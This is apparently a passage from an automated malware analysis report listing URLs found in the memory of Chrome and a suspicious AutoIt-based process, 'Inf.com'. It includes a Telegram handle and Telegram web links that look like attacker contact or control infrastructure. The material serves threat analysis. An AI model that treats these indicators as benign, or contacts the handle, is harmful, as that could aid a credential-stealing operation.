                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000011.00000003.2644901617.000051D802338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644868444.000051D802334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644766927.000051D802330000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000011.00000002.2697390661.000051D800C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                Source: chrome.exe, 00000011.00000002.2697740655.000051D800D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697067299.000051D800B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697359505.000051D800C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2697359505.000051D800C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default0
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000011.00000002.2699355988.000051D8011D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697359505.000051D800C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/oglpH
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionsUI
                Source: manifest.json0.27.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.c
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.go
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json0.27.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: manifest.json0.27.drString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2L
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2d
                Source: chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//H
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3H
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=H
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?K
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael$
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: chrome.exe, 00000011.00000002.2696504993.000051D8009BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044EA000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3268617637.000000000013D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, 0ZC2DB.13.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: Inf.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 00000011.00000003.2630638238.000051D800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000011.00000003.2611828132.000051D800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695161383.000051D800654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000011.00000002.2696611983.000051D800A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharPk3
                Source: chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharQ
                Source: chrome.exe, 00000011.00000002.2697452538.000051D800C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000011.00000002.2698418581.000051D800E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content.js.27.dr, content_new.js.27.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000011.00000002.2698312359.000051D800E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696190907.000051D8008F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000011.00000002.2698312359.000051D800E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696190907.000051D8008F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697067299.000051D800B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000011.00000002.2697067299.000051D800B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoQ
                Source: chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000011.00000002.2696504993.000051D8009BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000011.00000003.2630638238.000051D800294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000011.00000003.2646589128.000051D8024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000011.00000003.2659699616.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698393314.000051D800E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2633307189.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655794275.000051D800E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000011.00000003.2659699616.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698393314.000051D800E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2633307189.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655794275.000051D800E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.om
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
